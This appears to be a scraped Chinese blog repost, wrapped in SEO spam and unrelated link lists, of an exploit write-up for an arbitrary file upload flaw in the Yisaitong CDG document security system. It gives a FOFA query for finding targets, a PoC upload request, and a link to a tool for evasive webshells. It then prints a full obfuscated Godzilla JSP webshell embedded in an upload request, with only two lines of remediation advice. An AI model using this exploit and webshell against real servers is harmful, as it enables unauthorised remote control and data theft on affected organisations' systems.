当前位置: 首页 > news >正文

西安免费做网站公司网页设计简图

西安免费做网站公司,网页设计简图,电子商务网站建设与维护的教学,软件开发实例0x01 产品简介 亿赛通电子文档安全管理系统#xff08;简称#xff1a;CDG#xff09;是一款电子文档安全加密软件#xff0c;该系统利用驱动层透明加密技术#xff0c;通过对电子文档的加密保护#xff0c;防止内部员工泄密和外部人员非法窃取企业核心重要数据资产…0x01 产品简介 亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。 0x02 漏洞概述 亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞未经授权的攻击者可通过此漏洞上传恶意后门文件从而获取服务器权限。 0x03 影响范围 全局影响万级 0x04 复现环境 FOFAapp亿赛通-电子文档安全管理系统 0x05 漏洞复现 PoC POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1 Host: your-ip Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0文件内容 实践 PS上传后根目录访问tttT.jsp即可 漏洞利用 生成哥斯拉免杀马 工具地址https://github.com/Tas9er/ByPassGodzilla 尝试上传 POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1 Host: your-ip Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0%! String govsb_NQ c1976fc471d32d0b;String govsb_rRDYrq62F Tas9er;class govsb_yYcq09pP504Xb extends /*edusb_Yd*/ClassLoader {public govsb_yYcq09pP504Xb(ClassLoader govsb_vLM8) {super/*edusb_QST55l*/(govsb_vLM8);}public Class govsb_qvs(byte[] govsb_pHH5nFhGBGJrs) {return super./*edusb_9lA81*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_vZLmO*/(govsb_pHH5nFhGBGJrs, 1099931-1099931, govsb_pHH5nFhGBGJrs.length);}}public byte[] govsb_VA(byte[] govsb_RDLs5gMnLdx7, boolean govsb_FJ1cLOh5) {try {j\u0061\u0076\u0061\u0078./*edusb_yyAR3cHFdavJGU*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_Bsa1 j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_ugUsn1*/(AES);govsb_Bsa1.init(govsb_FJ1cLOh5?1099931/1099931:1099931/10999311099931/1099931,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_AD7*/SecretKeySpec/*edusb_qvGt5qn*/(govsb_NQ.getBytes(), AES));return govsb_Bsa1.doFinal/*edusb_f5*/(govsb_RDLs5gMnLdx7);} catch (Exception e) {return null;}}%%try {byte[] govsb_tby6ZYM2tmeJCk java.util.Base64./*edusb_Hr5K*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_Wty*/decode(request.getParameter(govsb_rRDYrq62F));govsb_tby6ZYM2tmeJCk govsb_VA(govsb_tby6ZYM2tmeJCk,false);if (session.getAttribute/*edusb_7*/(payload) null) {session.setAttribute(payload, new govsb_yYcq09pP504Xb(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_RqwVLvZTZBVeCp3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_V6FRLkLW*/.govsb_qvs(govsb_tby6ZYM2tmeJCk));} else {request.setAttribute(parameters, govsb_tby6ZYM2tmeJCk);java.io.ByteArrayOutputStream govsb_3 new java.io./*edusb_v9iBBl*/ByteArrayOutputStream();Object govsb_YCJ /*edusb_xLTC*/((Class) session.getAttribute(payload))./*edusb_Invmf*//*edusb_8Q5Mk*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_lSK4DHyA*/;govsb_YCJ.equals(govsb_3);govsb_YCJ.equals(pageContext);response.getWriter().write(9D0C38EF2C63233C8BB491A19883F59F.substring(1099931-1099931, 16));govsb_YCJ.toString();response.getWriter().write(java.util.Base64/*edusb_Qz*/.getEncoder()/*edusb_P9Bzr0TBcIv7y*/.encodeToString(govsb_VA(govsb_3.toByteArray(),true)));response.getWriter().write(9D0C38EF2C63233C8BB491A19883F59F.substring(16));}} catch (Exception e) {} % 尝试连接 0x06 修复建议 设置安全组仅对可信地址开放 升级至安全版本
http://www.dnsts.com.cn/news/226261.html

相关文章:

  • 商务网站要怎么设计可以做ps的网站
  • 企业网站开发一般多少钱建设网站的市场环境怎么样
  • 网站编辑主要做什么深圳市住房和建设局网站->认租申请
  • wordpress扒站工具湛江海田网站建设招聘
  • 网站都需要域名备案吗企业营销推广
  • dw做网站教程视频职业培训网络平台
  • 如何让百度快速收录网站文章模板建站难吗
  • 二手交易网站怎么做福州搜索优化公司
  • 网站换服务器百度不收录游戏代理平台免费版
  • 织梦网站栏目调用393网站
  • 怎么优化网站关键词的方法wordpress 加密算法
  • 威海 网站建设centos 7 wordpress install
  • 苏州吴中区建设局网站app应用开发的价位
  • 网站建设中ftp起什么作用wordpress 文章 打赏
  • 延边州建设局网站专业网站优化软件
  • 营销型网站开发制作社交网站开发项目计划报告
  • 做数据分析网站企业网站建设产品设计书
  • 六安网站制作哪家好网站导航栏最多可以做几个
  • 网站行业婚纱摄影东莞网站建设技术支持
  • 网站建设资质备案定制家具如何选择
  • 网站设计制作发展趋势wordpress没有侧边栏
  • 做设计英文网站网站设计稿一般尺寸
  • 米拓模板网站建设网站建设预算知乎
  • 为什么要网站备案浙江网新股吧
  • 在线网站软件免费下载什么公司适合做seo优化
  • chn域名网站wordpress 制作网站
  • 拼车网站的建设雨实现休闲网站建设
  • layui 网站建设模板百度地图手机网站代码
  • 大姚网站建设郑州网站建设的公司哪家好
  • dede自适应网站注意事项网站的seo 如何优化